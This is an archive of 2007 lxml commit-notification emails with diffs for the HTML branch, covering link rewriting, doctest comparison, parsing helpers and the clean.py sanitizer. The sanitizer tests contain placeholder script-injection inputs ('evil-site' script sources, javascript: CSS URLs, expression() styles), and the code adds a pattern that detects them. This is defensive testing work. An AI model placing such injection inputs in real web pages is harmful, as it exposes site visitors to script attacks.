From ianb at codespeak.net Fri Jun 1 06:18:44 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:18:44 +0200 (CEST) Subject: [Lxml-checkins] r43954 - lxml/branch/html/src/lxml Message-ID: <20070601041844.70BB48093@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:18:43 2007 New Revision: 43954 Modified: lxml/branch/html/src/lxml/doctestcompare.py Log: Change the diff output a bit; only parse if both got *and* want look like HTML/XML Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Fri Jun 1 06:18:43 2007 @@ -78,9 +78,11 @@ parser = HTML elif PARSE_XML & optionflags: parser = etree.XML - elif want.strip().lower().startswith('' % tag @@ -297,7 +299,7 @@ if not got: return '' return self.format_text(got, strip) - text = '%s (not %s)' % (got, want) + text = '%s (got: %s)' % (want, got) return self.format_text(text, strip) class LHTMLOutputChecker(LXMLOutputChecker): From ianb at codespeak.net Fri Jun 1 06:25:27 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:25:27 +0200 (CEST) Subject: [Lxml-checkins] r43955 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601042527.A7A778093@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:25:27 2007 New Revision: 43955 Removed: lxml/branch/html/src/lxml/html/rewritelinks.py Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Log: Move all the link functions directly into __init__; change rewriting to all use iter_links Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 06:25:27 2007 @@ -1,13 +1,19 @@ import threading import re +import urlparse from lxml import etree +from lxml.html import defs -__all__ = ['HTML', 'tostring', 'Element'] +__all__ = ['HTML', 'tostring', 'Element', 'defs', + 'find_rel_links', 'find_class', 'make_links_absolute', + 'resolve_base_href', 'iter_links', 'rewrite_links'] _rel_links_xpath = etree.XPath("descendant-or-self::a[fn:upper-case(@rel)=$rel]") #_class_xpath = etree.XPath(r"descendant-or-self::*[regexp:match(@class, concat('\b', $class_name, '\b'))]", {'regexp': 'http://exslt.org/regular-expressions'}) _class_xpath = etree.XPath("descendant-or-self::*[contains(concat(' ', normalize-space(@class), ' '), concat(' ', $class_name, ' '))]") _id_xpath = etree.XPath("descendant-or-self::*[@id=$id]") +_css_url_re = re.compile(r'url\((.*?)\)', re.I) +_css_import_re = re.compile(r'@import "(.*?)"') class HtmlMixin(object): @@ -110,8 +116,11 @@ tags in the document are used *and* removed from the document. If it is false then any such tag is ignored. """ - from lxml.html.rewritelinks import make_links_absolute - make_links_absolute(self, base_href, resolve_base_href=resolve_base_href) + if resolve_base_href: + self.resolve_base_href() + def link_repl(href): + return urlparse.urljoin(base_href, href) + self.rewrite_links(link_repl) def resolve_base_href(self): """ @@ -119,25 +128,38 @@ values to all links found in the document. Also remove the tag once it has been applied. """ - from lxml.html.rewritelinks import resolve_base_href - resolve_base_href(self) - - def iter_links(self, in_order=True): - """ - Iterate over all the links in the document, yielding - ``(element, attribute, link)``. - - The ``element`` contains the link. ``attribute`` is a string - like ``'href'`` or ``'src'``. It may be None, which means - that the link is in the body of the element. The only type - this occurs is with `` - ... - ... - ... - ... - ... - ... - ...
- ... - ... Hi world! - ...
- ... ''', False)) - link href="style.css" - a href="/test.html" - a href="/other.html" - script src="/js-funcs.js" - img src="/logo.gif" - style None="/bg.gif"@40 - style None="/other-styles.css"@69 - td style="/td-bg.png"@22 From ianb at codespeak.net Fri Jun 1 06:35:35 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:35:35 +0200 (CEST) Subject: [Lxml-checkins] r43956 - lxml/branch/html/src/lxml/html Message-ID: <20070601043535.E300D809C@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:35:35 2007 New Revision: 43956 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: rename get_text_content to text_content. Add docstring and notes Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 06:35:35 2007 @@ -1,6 +1,7 @@ import threading import re import urlparse +import copy from lxml import etree from lxml.html import defs @@ -96,7 +97,7 @@ except IndexError: return default - def get_text_content(self): + def text_content(self): """ Return the text content of the tag (and the text in any children). """ @@ -200,6 +201,19 @@ class _MethodFunc(object): + """ + An object that represents a method on an element as a function; + the function takes either an element or an HTML string. It + returns whatever the function normally returns, or if the function + works in-place (and so returns None) it returns a serialized form + of the resulting document. + """ + # FIXME: the None test is a bit sloppy FIXME: this is basically + # functional if you use it with a string; should it be a + # functional equivalent for working with elements too? It has to + # make a copy of the document. The problem is it changes the + # return type, as it should return the copied document and not a + # serialization. Is that odd? def __init__(self, name, fragment=False, source_class=HtmlMixin): self.name = name self.fragment = fragment From ianb at codespeak.net Fri Jun 1 06:41:44 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:41:44 +0200 (CEST) Subject: [Lxml-checkins] r43957 - lxml/branch/html/src/lxml/html Message-ID: <20070601044144.31619809F@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:41:43 2007 New Revision: 43957 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: remove the sub-module function wrappers Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 06:41:43 2007 @@ -243,29 +243,6 @@ iter_links = _MethodFunc('iter_links') rewrite_links = _MethodFunc('rewrite_links') -class _SubmoduleFunc(object): - def __init__(self, module, name, doc=None): - self.module = module - self.name = name - self.obj = None - if doc is None: - doc = 'See %s.%s' % (module, name) - self.__doc__ = doc - def __call__(self, *args, **kw): - if self.obj is None: - import sys - __import__(self.module) - mod = sys.modules(self.module) - self.obj = getattr(mod, self.name) - self.__doc__ = self.obj.__doc__ - return self.obj(*args, **kw) - -# FIXME: Damn module names conflict with the function names :( -#clean = _SubmoduleFunc('lxml.html.clean', 'clean') -#clean_html = _SubmoduleFunc('lxml.html.clean', 'clean_html') -#htmldiff = _SubmoduleFunc('lxml.html.htmldiff', 'htmldiff') -#html_annotate = _SubmoduleFunc('lxml.html.htmldiff', 'html_annotate') - class HtmlComment(etree.CommentBase, HtmlMixin): pass From ianb at codespeak.net Fri Jun 1 06:41:55 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:41:55 +0200 (CEST) Subject: [Lxml-checkins] r43958 - lxml/branch/html/src/lxml/html/tests Message-ID: <20070601044155.EC494809F@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:41:55 2007 New Revision: 43958 Modified: lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Log: remove references to now-gone rewritelinks module Modified: lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Fri Jun 1 06:41:55 2007 @@ -1,52 +1,13 @@ -These are tests of relocateresponse:: +We'll define a link translation function: - >>> from lxml.html.rewritelinks import Relocator - -In all these examples we'll be using ``http://old`` for the old -(to-be-replaced) URL and ``https://new`` for the new URL (note the -scheme change). To test the rewriting we'll use this handy rewriter -that rewrites everything from one base to another base:: - - >>> relocate_href = Relocator( - ... base_href='http://old/base/path.html', - ... old_href='http://old/', - ... new_href='https://new/') - -Now lets look at simple href rewriting. Normal rewrite:: - - >>> relocate_href('http://old/bar') - 'https://new/bar' - -Note that the trailing / doesn't matter in this one case (since -``http://old`` and ``http://old/`` are entirely equivalent):: - - >>> relocate_href('http://old') - 'https://new/' - -The trailing / does matter in other cases:: - - >>> Relocator( - ... base_href='', - ... old_href='http://old-test/foo/', - ... new_href='https://new', - ... )('http://old-test/foo') - 'http://old-test/foo' - >>> Relocator( - ... base_href='', - ... old_href='http://old-test/foo/', - ... new_href='https://new', - ... )('http://old-test/foo/') - 'https://new' - -Rewriting a link that doesn't match old_href is a no-op:: - - >>> relocate_href('http://foo/bar') - 'http://foo/bar' - -Relative links are handled:: - - >>> relocate_href('index.html') - 'https://new/base/index.html' + >>> base_href = 'http://old/base/path.html' + >>> import urlparse + >>> def relocate_href(link): + ... link = urlparse.urljoin(base_href, link) + ... if link.startswith('http://old'): + ... return 'https://new' + link[len('http://old'):] + ... else: + ... return link Now for content. First, to make it easier on us, we need to trim the normalized HTML we get from these functions:: From ianb at codespeak.net Fri Jun 1 06:58:08 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 06:58:08 +0200 (CEST) Subject: [Lxml-checkins] r43959 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601045808.E8E2C80B0@code0.codespeak.net> Author: ianb Date: Fri Jun 1 06:58:08 2007 New Revision: 43959 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: Fix find_rel_links Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 06:58:08 2007 @@ -9,7 +9,7 @@ 'find_rel_links', 'find_class', 'make_links_absolute', 'resolve_base_href', 'iter_links', 'rewrite_links'] -_rel_links_xpath = etree.XPath("descendant-or-self::a[fn:upper-case(@rel)=$rel]") +_rel_links_xpath = etree.XPath("descendant-or-self::a[@rel]") #_class_xpath = etree.XPath(r"descendant-or-self::*[regexp:match(@class, concat('\b', $class_name, '\b'))]", {'regexp': 'http://exslt.org/regular-expressions'}) _class_xpath = etree.XPath("descendant-or-self::*[contains(concat(' ', normalize-space(@class), ' '), concat(' ', $class_name, ' '))]") _id_xpath = etree.XPath("descendant-or-self::*[@id=$id]") @@ -71,13 +71,15 @@ """ Find any links like ``...``; returns a list of elements. """ - return _rel_links_xpath(self, rel=rel.lower()) + rel = rel.lower() + return [el for el in _rel_links_xpath(self) + if el.attrib['rel'].lower() == rel] def find_class(self, class_name): """ Find any elements with the given class name. """ - return _class_xpath(self, class_name=class_name.lower()) + return _class_xpath(self, class_name=class_name) def get_element_by_id(self, id, default=None): """ Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Fri Jun 1 06:58:08 2007 @@ -27,16 +27,14 @@ Also added is a get_rel_links, which you can use to search for links like ````: - >>> h = HTML(''' - ... test 1 - ... - ... item 3 - ... item 4''') - >>> print [e.attrib['href'] for e in h.find_rel_links('tag')] - ['2'] - >>> print [e.attrib['href'] for e in h.find_rel_links('nofollow')] - [] - -FIXME: actually that should have returned ['2', '4'] + >>> h = HTML(''' + ... test 1 + ... + ... item 3 + ... item 4''') + >>> print [e.attrib['href'] for e in h.find_rel_links('tag')] + ['2', '4'] + >>> print [e.attrib['href'] for e in h.find_rel_links('nofollow')] + [] From ianb at codespeak.net Fri Jun 1 07:09:12 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 07:09:12 +0200 (CEST) Subject: [Lxml-checkins] r43960 - lxml/branch/html/src/lxml Message-ID: <20070601050912.E7C5C80A8@code0.codespeak.net> Author: ianb Date: Fri Jun 1 07:09:12 2007 New Revision: 43960 Modified: lxml/branch/html/src/lxml/doctestcompare.py Log: avoid treating a single repr() of an object like markup Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Fri Jun 1 07:09:12 2007 @@ -31,6 +31,9 @@ import doctest import cgi +__all__ = ['PARSE_HTML', 'PARSE_XML', 'LXMLOutputChecker', + 'LHTMLOutputChecker', 'install', 'temp_install'] + PARSE_HTML = doctest.register_optionflag('PARSE_HTML') PARSE_XML = doctest.register_optionflag('PARSE_XML') @@ -42,6 +45,9 @@ else: return v.strip() +# We use this to distinguish repr()s from elements: +_repr_re = re.compile(r'^<[^>]+ (at|object) ') + class LXMLOutputChecker(OutputChecker): empty_tags = ( @@ -81,11 +87,16 @@ elif (want.strip().lower().startswith(' Author: ianb Date: Fri Jun 1 07:09:38 2007 New Revision: 43961 Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt Log: added some more tests for basic functionality Modified: lxml/branch/html/src/lxml/html/tests/test_basic.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_basic.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_basic.txt Fri Jun 1 07:09:38 2007 @@ -1,6 +1,6 @@ lxml.html adds a find_class method to elements:: - >>> from lxml.html import HTML, tostring + >>> from lxml.html import HTML, tostring, parse_element >>> from lxml.html.clean import clean, clean_html >>> from lxml.html import usedoctest >>> h = HTML(''' @@ -25,7 +25,7 @@ ['P1', 'P2'] Also added is a get_rel_links, which you can use to search for links -like ````: +like ````:: >>> h = HTML(''' ... test 1 @@ -37,4 +37,46 @@ >>> print [e.attrib['href'] for e in h.find_rel_links('nofollow')] [] +Another method is ``get_element_by_id`` that does what it says:: + >>> print tostring(HTML(''' + ...
+ ... stuff + ...
''').get_element_by_id('test')) + stuff + +Or to get the content of an element without the tags, use text_content():: + + >>> el = parse_element(''' + ...
This is a bold link
''') + >>> el.text_content() + 'This is a bold link' + +Or drop both tags (leaving content) or the entire element, like:: + + >>> doc = HTML(''' + ... + ... + ...
+ ... This is a test of stuff. + ...
+ ...
footer
+ ... + ... ''') + >>> doc.get_element_by_id('link').drop_tag() + >>> print tostring(doc) + + +
+ This is a test of stuff. +
+
footer
+ + + >>> doc.get_element_by_id('body').drop_element() + >>> print tostring(doc) + + +
footer
+ + From ianb at codespeak.net Fri Jun 1 07:10:51 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 07:10:51 +0200 (CEST) Subject: [Lxml-checkins] r43962 - lxml/branch/html/src/lxml/html Message-ID: <20070601051051.EDCF180A8@code0.codespeak.net> Author: ianb Date: Fri Jun 1 07:10:51 2007 New Revision: 43962 Modified: lxml/branch/html/src/lxml/html/clean.py Log: added some more tests for basic functionality Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 07:10:51 2007 @@ -97,6 +97,10 @@ This modifies the document *in place*. """ + # First, handle a case that IE treats like , and that can + # confuse either this step or later steps. + for el in doc.xpath('descendant-or-self::image'): + el.tag = 'img' kill_tags = [] remove_tags = list(remove_tags or []) if scripts: From ianb at codespeak.net Fri Jun 1 07:12:30 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 07:12:30 +0200 (CEST) Subject: [Lxml-checkins] r43963 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601051230.F0A0680A8@code0.codespeak.net> Author: ianb Date: Fri Jun 1 07:12:30 2007 New Revision: 43963 Modified: lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/test_clean.txt Log: Handle in clean Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 07:12:30 2007 @@ -11,7 +11,6 @@ # Other on* attributes that aren't standard? # Try these tests: http://feedparser.org/tests/wellformed/sanitize/ # Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl -# IE treats like # ...? # and is fishy in a fragment # max width for words Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_clean.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_clean.txt Fri Jun 1 07:12:30 2007 @@ -19,6 +19,7 @@ ... </form> ... <blink>annoying EVIL!</blink> ... <a href="evil-site">spam spam SPAM!</a> +... <image src="evil!"> ... </body> ... </html>''' >>> print doc @@ -40,6 +41,7 @@ </form> <blink>annoying EVIL!</blink> <a href="evil-site">spam spam SPAM!</a> + <image src="evil!"> </body> </html> >>> print tostring(HTML(doc)) @@ -61,6 +63,7 @@ </form> <blink>annoying EVIL!</blink> <a href="evil-site">spam spam SPAM!</a> + <image src="evil!"> </body> </html> >>> print clean_html(doc) @@ -76,6 +79,7 @@ Password: <blink>annoying EVIL!</blink> <a href="evil-site">spam spam SPAM!</a> + <img src="evil!"> </body> </html> >>> print clean_html(doc, style=True, links=True, add_nofollow=True) @@ -90,5 +94,6 @@ Password: <blink>annoying EVIL!</blink> <a href="evil-site" rel="nofollow">spam spam SPAM!</a> + <img src="evil!"> </body> </html> From ianb at codespeak.net Fri Jun 1 08:34:17 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 08:34:17 +0200 (CEST) Subject: [Lxml-checkins] r43967 - lxml/branch/html/src/lxml Message-ID: <20070601063417.C100880A1@code0.codespeak.net> Author: ianb Date: Fri Jun 1 08:34:17 2007 New Revision: 43967 Modified: lxml/branch/html/src/lxml/doctestcompare.py Log: normalize whitespace before comparing text Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Fri Jun 1 08:34:17 2007 @@ -45,8 +45,12 @@ else: return v.strip() +def norm_whitespace(v): + return _norm_whitespace_re.sub(' ', v) + # We use this to distinguish repr()s from elements: _repr_re = re.compile(r'^<[^>]+ (at|object) ') +_norm_whitespace_re = re.compile(r'[ \t\n][ \t\n]+') class LXMLOutputChecker(OutputChecker): @@ -130,8 +134,8 @@ want = want or '' got = got or '' if strip: - want = want.strip() - got = got.strip() + want = norm_whitespace(want).strip() + got = norm_whitespace(got).strip() want = '^%s$' % re.escape(want) want = want.replace(r'\.\.\.', '.*') if re.search(want, got): From ianb at codespeak.net Fri Jun 1 08:35:35 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 08:35:35 +0200 (CEST) Subject: [Lxml-checkins] r43968 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601063535.3C58E80A1@code0.codespeak.net> Author: ianb Date: Fri Jun 1 08:35:34 2007 New Revision: 43968 Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/test_clean.txt Log: Clean using rewrite_links; catch expression() in styles Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 08:35:34 2007 @@ -178,6 +178,9 @@ If you give ``base_href`` then all links passed to ``link_repl_func()`` will take that into account. + + If the ``link_repl_func`` returns None, the attribute or + tag text will be removed completely. """ if base_href is not None: # FIXME: this can be done in one pass with a wrapper @@ -189,6 +192,13 @@ new_link = link_repl_func(link) if new_link == link: continue + if new_link is None: + # Remove the attribute or element content + if attrib is None: + el.text = '' + else: + del el.attrib[attrib] + continue if attrib is None: new = el.text[:pos] + new_link + el.text[pos+len(link):] el.text = new Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 08:35:34 2007 @@ -1,3 +1,4 @@ +import re from lxml import etree from lxml.html import defs from lxml.html import HTML, tostring @@ -5,9 +6,6 @@ __all__ = ['clean_html', 'clean'] # FIXME: I should study this for more ideas: http://feedparser.org/docs/html-sanitization.html -# In CSS/style attribute: -# url(javascript:...) -# expression(...) # Other on* attributes that aren't standard? # Try these tests: http://feedparser.org/tests/wellformed/sanitize/ # Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl @@ -19,6 +17,10 @@ # CSS stuff? # remove images? +# This is an IE-specific construct you can have in a stylesheet to +# run some Javascript: +_css_javascript_re = re.compile( + r'expression\(.*?\)', re.S|re.I) def clean_html(html, **kw): """ @@ -108,14 +110,18 @@ for attrib in defs.event_attrs: for el in doc.xpath('descendant-or-self::*[@%s]' % attrib): del el.attrib[attrib] - for attrib in defs.link_attrs: - # FIXME: should call lower-case() - # FIXME: starts-with isn't really good either, because - # href=" javascript:..." is also a problem - for el in doc.xpath("descendant-or-self::*[starts-with(@%s, 'javascript:')]" % attrib): - if isinstance(el, basestring): - assert 0, repr(el) - el.attrib[attrib] = "" + doc.rewrite_links(_remove_javascript, resolve_base_href=False) + if not style: + for el in doc.xpath('descendant-or-self::*[@style]'): + old = el.attrib['style'] + new = _css_javascript_re.sub('', old) + if new != old: + el.attrib['style'] = new + for el in doc.xpath('descendant-or-self::style'): + old = el.text or '' + new = _css_javascript_re.sub('', old) + if new != old: + el.text = new if comments: # Easier way? bad = [] @@ -183,3 +189,9 @@ continue el.attrib['rel'] = 'nofollow' +def _remove_javascript(link): + if link.strip().startswith('javascript:'): + # FIXME: should this be None to delete? + return '' + return link + Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_clean.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_clean.txt Fri Jun 1 08:35:34 2007 @@ -5,6 +5,10 @@ ... <head> ... <script type="text/javascript" src="evil-site"></script> ... <link rel="alternate" type="text/rss" src="evil-rss"> +... <style> +... body {background-image: url(javascript:do_evil)}; +... div {color: expression(evil)}; +... </style> ... </head> ... <body onload="evil_function()"> ... <!-- I am interpreted for EVIL! --> @@ -27,6 +31,10 @@ <head> <script type="text/javascript" src="evil-site"></script> <link rel="alternate" type="text/rss" src="evil-rss"> + <style> + body {background-image: url(javascript:do_evil)}; + div {color: expression(evil)}; + </style> </head> <body onload="evil_function()"> <!-- I am interpreted for EVIL! --> @@ -49,6 +57,10 @@ <head> <script type="text/javascript" src="evil-site"></script> <link rel="alternate" type="text/rss" src="evil-rss"> + <style> + body {background-image: url(javascript:do_evil)}; + div {color: expression(evil)}; + </style> </head> <body onload="evil_function()"> <!-- I am interpreted for EVIL! --> @@ -70,6 +82,10 @@ <html> <head> <link rel="alternate" type="text/rss" src="evil-rss"> + <style> + body {background-image: url()}; + div {color: }; + </style> </head> <body> <a href="">a link</a> From ianb at codespeak.net Fri Jun 1 08:39:16 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 08:39:16 +0200 (CEST) Subject: [Lxml-checkins] r43969 - lxml/branch/html/src/lxml/html Message-ID: <20070601063916.536348077@code0.codespeak.net> Author: ianb Date: Fri Jun 1 08:39:16 2007 New Revision: 43969 Modified: lxml/branch/html/src/lxml/html/clean.py Log: don't delete fieldset and legend. Do remove <layer> Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 08:39:16 2007 @@ -9,7 +9,6 @@ # Other on* attributes that aren't standard? # Try these tests: http://feedparser.org/tests/wellformed/sanitize/ # Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl -# <layer>...? # <head> and <title> is fishy in a fragment # max width for words # max height? @@ -141,13 +140,12 @@ if meta: kill_tags.append('meta') if embedded: - kill_tags.extend(['object', 'embed', 'iframe', 'applet']) + # FIXME: is <layer> really embedded? + kill_tags.extend(['object', 'embed', 'iframe', 'applet', 'layer']) if frames: kill_tags.extend(defs.frame_tags) if forms: - # FIXME: do I even care about fieldset and legend? I don't - # care about label. - remove_tags.extend(['form', 'fieldset', 'legend']) + remove_tags.extend(['form']) kill_tags.extend(['button', 'input', 'select', 'textarea']) bad = [] for el in doc.iterdescendants(): From ianb at codespeak.net Fri Jun 1 08:41:26 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 08:41:26 +0200 (CEST) Subject: [Lxml-checkins] r43970 - lxml/branch/html/src/lxml/html Message-ID: <20070601064126.67BE9809F@code0.codespeak.net> Author: ianb Date: Fri Jun 1 08:41:25 2007 New Revision: 43970 Modified: lxml/branch/html/src/lxml/html/clean.py Log: add page_structure removal; for clean_html parse the html as a fragment Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 08:41:25 2007 @@ -1,7 +1,7 @@ import re from lxml import etree from lxml.html import defs -from lxml.html import HTML, tostring +from lxml.html import parse_element, tostring __all__ = ['clean_html', 'clean'] @@ -9,7 +9,6 @@ # Other on* attributes that aren't standard? # Try these tests: http://feedparser.org/tests/wellformed/sanitize/ # Also http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl -# <head> and <title> is fishy in a fragment # max width for words # max height? # autolink? @@ -26,7 +25,7 @@ Like clean(), but takes a text input document, and returns a text document. """ - doc = HTML(html) + doc = parse_element(html, create_parent=True) clean(doc, **kw) return tostring(doc) @@ -38,6 +37,7 @@ style=False, links=False, meta=False, + page_structure=False, embedded=True, frames=True, forms=True, @@ -69,12 +69,15 @@ ``meta``: Remove any ``<meta>`` tags - ``frames``: - Remove any frame-related tags + ``page_structure``: + Structural parts of a page: ``<head>``, ``<html>``, ``<title>`` ``embedded``: Remove any embedded objects (flash, iframes) + ``frames``: + Remove any frame-related tags + ``forms``: Remove any form tags @@ -139,6 +142,8 @@ kill_tags.append('link') if meta: kill_tags.append('meta') + if page_structure: + remove_tags.extend(['head', 'html', 'title']) if embedded: # FIXME: is <layer> really embedded? kill_tags.extend(['object', 'embed', 'iframe', 'applet', 'layer']) From ianb at codespeak.net Fri Jun 1 20:11:25 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 20:11:25 +0200 (CEST) Subject: [Lxml-checkins] r43976 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601181125.702FA80A2@code0.codespeak.net> Author: ianb Date: Fri Jun 1 20:11:25 2007 New Revision: 43976 Added: lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py (contents, props changed) lxml/branch/html/src/lxml/html/tests/transform_feedparser_data.py (contents, props changed) Modified: lxml/branch/html/src/lxml/html/__init__.py lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/defs.py Log: Added tests from feedparser. Make sure to traverse the root element as well as children (_itertree). Keep contents of some tags like <iframe>. Add filter for <blink>. Add new parser that handles random HTML a bit better. Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 20:11:25 2007 @@ -269,7 +269,7 @@ # FIXME: should this notice a fragment and parse accordingly? value = etree.HTML(html, html_parser) if value is None: - raise ParserError( + raise etree.ParserError( "Could not parse document") return value @@ -283,15 +283,18 @@ of only elements. """ # FIXME: check what happens when you give html with a body, head, etc. - html = '<html><body>%s</body></html>' % html + start = html[:20].lstrip().lower() + if not start.startswith('<html') and not start.startswith('<!doctype'): + # FIXME: That test doesn't work with a doctype or PI + html = '<html><body>%s</body></html>' % html doc = HTML(html) assert doc.tag == 'html' bodies = [e for e in doc if e.tag == 'body'] - assert len(bodies) == 1 + assert len(bodies) == 1, ("too many bodies: %r in %r" % (bodies, html)) body = bodies[0] elements = [] if no_leading_text and body.text and body.text.strip(): - raise ParserError( + raise etree.ParserError( "There is leading text: %r" % body.text) if body.text and body.text.strip(): elements.append(body.text) @@ -313,21 +316,81 @@ if not isinstance(create_parent, basestring): create_parent = 'div' return parse_element('<%s>%s</%s>' % (create_parent, html, create_parent)) + else: + print '----------\n', html elements = parse_elements(html, no_leading_text=True) if not elements: - raise ParserError( + raise etree.ParserError( "No elements found") if len(elements) > 1: - raise ParserError( + raise etree.ParserError( "Multiple elements found (%s)" - % ', '.join([e.tag for e in elements])) + % ', '.join([_element_name(e) for e in elements])) el = elements[0] if el.tail and el.tail.strip(): - raise ParserError( + raise etree.ParserError( "Element followed by text: %r" % el.tail) el.tail = None return el +def parse(html): + """ + Parse the html, returning a single element/document. + + This tries to minimally parse the chunk of text, without knowing if it + is a fragment or a document. + """ + start = html[:10].lstrip().lower() + if start.startswith('<html') or start.startswith('<!doctype'): + # Looks like a full HTML document + return HTML(html) + # otherwise, lets parse it out... + doc = HTML(html) + bodies = doc.findall('body') + body = bodies[0] + if len(bodies) > 1: + # Somehow there are multiple bodies, which is bad, but just + # smash them into one body + for other_body in bodies[1:]: + if other_body.text: + if len(body): + body[-1].tail = (body[-1].tail or '') + other_body.text + else: + body.text = (body.text or '') + other_body.text + body.extend(other_body) + # We'll ignore tail + # I guess we are ignoring attributes too + other_body.drop_element() + heads = doc.findall('head') + if heads: + # Well, we have some sort of structure, so lets keep it all + head = heads[0] + if len(heads) > 1: + for other_head in heads[1:]: + head.extend(other_head) + # We don't care about text or tail in a head + other_head.drop_element() + return doc + + if (len(body) == 1 and (not body.text or not body.text.strip()) + and (not body[-1].tail or not body[-1].tail.strip())): + # The body has just one element, so it was probably a single + # element passed in + return body[0] + # Now we have a body which represents a bunch of tags which have the + # content that was passed in. We will create a fake container, which + # is the body tag, except body implies too much structure. + body.tag = 'div' + return body + +def _element_name(el): + if isinstance(el, etree.CommentBase): + return 'comment' + elif isinstance(el, basestring): + return 'string' + else: + return el.tag + def 